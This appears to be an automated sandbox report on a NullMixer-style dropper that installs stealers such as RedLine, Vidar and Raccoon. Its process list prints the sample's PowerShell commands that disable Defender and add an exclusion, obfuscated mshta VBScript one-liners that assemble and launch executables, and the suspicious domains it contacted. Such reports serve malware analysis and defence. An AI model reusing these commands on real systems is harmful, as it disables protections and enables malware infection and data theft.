Analysis Overview
SHA256
31e01879dfaafe473840c755dedc6390305167a580e24c64d80315731ac6bc4f
Threat Level: Known bad
The file 31e01879dfaafe473840c755dedc6390305167a580e24c64d80315731ac6bc4f was found to be: Known bad.
Malicious Activity Summary
Redline family
Privateloader family
Onlylogger family
Fabookie family
SectopRAT
Socelars family
xmrig
Vidar
Xmrig family
Raccoon family
Socelars payload
Vidar family
Detect Fabookie payload
SectopRAT payload
Raccoon Stealer V1 payload
Fabookie
NullMixer
RedLine
Sectoprat family
Nullmixer family
OnlyLogger
Gcleaner family
RedLine payload
Socelars
PrivateLoader
Raccoon
GCleaner
OnlyLogger payload
Vidar Stealer
XMRig Miner payload
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Checks computer location settings
Loads dropped DLL
Reads user/profile data of web browsers
ASPack v2.12-2.42
Drops Chrome extension
Looks up geolocation information via web service
Looks up external IP address via web service
Blocklisted process makes network request
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Drops file in Program Files directory
Unsigned PE
Program crash
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
NSIS installer
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: GetForegroundWindowSpam
Kills process with taskkill
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Uses Task Scheduler COM API
Modifies Internet Explorer settings
Suspicious use of UnmapMainImage
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of FindShellTrayWindow
Checks SCSI registry key(s)
Suspicious use of SendNotifyMessage
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Scheduled Task/Job: Scheduled Task
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-10 17:25
Signatures
Privateloader family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral8
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win10v2004-20241007-en
Max time kernel
5s
Max time network
151s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Redline family
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06ebc37d1c94352.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06ebc37d1c94352.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06f5ed0e3bb24.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0663b341399ee.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat062000ca9aa6.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0647140c100d63.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0663b341399ee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat060fd7e42d2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0675f75df01bdb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06ebc37d1c94352.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0618d93ac2c5c.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06f5ed0e3bb24.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0619212f22dd7.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe | N/A |
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0675f75df01bdb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0618d93ac2c5c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06f5ed0e3bb24.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0647140c100d63.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat062000ca9aa6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0619212f22dd7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0663b341399ee.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0647140c100d63.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0647140c100d63.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0647140c100d63.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06ebc37d1c94352.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0663b341399ee.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat062000ca9aa6.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0647140c100d63.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat060fd7e42d2.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat06f5ed0e3bb24.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0619212f22dd7.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat06ebc37d1c94352.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0618d93ac2c5c.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0675f75df01bdb.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2684 -ip 2684
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat062000ca9aa6.exe
Sat062000ca9aa6.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0647140c100d63.exe
Sat0647140c100d63.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0663b341399ee.exe
Sat0663b341399ee.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat060fd7e42d2.exe
Sat060fd7e42d2.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0675f75df01bdb.exe
Sat0675f75df01bdb.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06ebc37d1c94352.exe
Sat06ebc37d1c94352.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0618d93ac2c5c.exe
Sat0618d93ac2c5c.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06f5ed0e3bb24.exe
Sat06f5ed0e3bb24.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0619212f22dd7.exe
Sat0619212f22dd7.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2684 -s 572
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3076 -ip 3076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1500 -ip 1500
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3076 -s 360
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 852
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat062000ca9aa6.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat062000ca9aa6.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscRIpT: ClOsE(CReAteObJect("WScRipT.ShELL" ).RUn ( "CMd.eXE /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06f5ed0e3bb24.exe"" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if """"== """" for %z in ( ""C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06f5ed0e3bb24.exe"" ) do taskkill -Im ""%~nXz"" /F ", 0 , TrUe ) )
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0663b341399ee.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0663b341399ee.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1500 -ip 1500
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 860
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0663b341399ee.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0663b341399ee.exe") do taskkill /F -Im "%~NxU"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06f5ed0e3bb24.exe" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if ""== "" for %z in ( "C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06f5ed0e3bb24.exe" ) do taskkill -Im "%~nXz" /F
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1500 -ip 1500
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 920
C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe
H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5
C:\Windows\SysWOW64\taskkill.exe
taskkill -Im "Sat06f5ed0e3bb24.exe" /F
C:\Users\Admin\AppData\Local\Temp\09xU.exE
09xU.EXE -pPtzyIkqLZoCarb5ew
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat062000ca9aa6.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat062000ca9aa6.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscRIpT: ClOsE(CReAteObJect("WScRipT.ShELL" ).RUn ( "CMd.eXE /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe"" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if ""/paMxRK9ViV3PT5Jnz5""== """" for %z in ( ""C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe"" ) do taskkill -Im ""%~nXz"" /F ", 0 , TrUe ) )
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 1500 -ip 1500
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 928
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if "/paMxRK9ViV3PT5Jnz5"== "" for %z in ( "C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe" ) do taskkill -Im "%~nXz" /F
C:\Windows\SysWOW64\taskkill.exe
taskkill /F -Im "Sat0663b341399ee.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 1500 -ip 1500
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 956
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRIpt: cLosE( CREAteobjEcT( "WscRiPt.SHeLl" ). rUN ("C:\Windows\system32\cmd.exe /Q /r eCho NqN%TIME%> FvfG42h.8 & echo | Set /P = ""MZ"" > IiKZCUV.MQ& CoPY /Y /b iIKZCUV.MQ + 6H87pFZ.4 + FDKD47Ef.I1 + U56d.R + JB946RB.I7A + Q_tW.pL + BTDIJ1.FYL + FVfg42H.8 XHnbBPN.0kM & StArT msiexec.exe /y .\xHnBBPN.0kM " ,0 ,True ) )
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1500 -ip 1500
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 988
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /Q /r eCho NqN%TIME%> FvfG42h.8& echo | Set /P = "MZ" > IiKZCUV.MQ& CoPY /Y /b iIKZCUV.MQ +6H87pFZ.4 +FDKD47Ef.I1+U56d.R+ JB946RB.I7A + Q_tW.pL+BTDIJ1.FYL+ FVfg42H.8 XHnbBPN.0kM & StArT msiexec.exe /y .\xHnBBPN.0kM
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>IiKZCUV.MQ"
C:\Windows\SysWOW64\control.exe
control .\R6f7sE.I
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )
C:\Windows\SysWOW64\msiexec.exe
msiexec.exe /y .\xHnBBPN.0kM
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1500 -ip 1500
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 1016
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "Sat0675f75df01bdb.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0675f75df01bdb.exe" & exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1500 -ip 1500
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 1140
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
C:\Windows\SysWOW64\taskkill.exe
taskkill /im "Sat0675f75df01bdb.exe" /f
C:\Windows\SysWOW64\control.exe
control .\R6f7sE.I
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gazrxlog.xyz | udp |
| NL | 45.133.1.107:80 | tcp | |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | whealclothing.xyz | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | my-all-group.bar | udp |
| US | 8.8.8.8:53 | m525-blockchain31432.bar | udp |
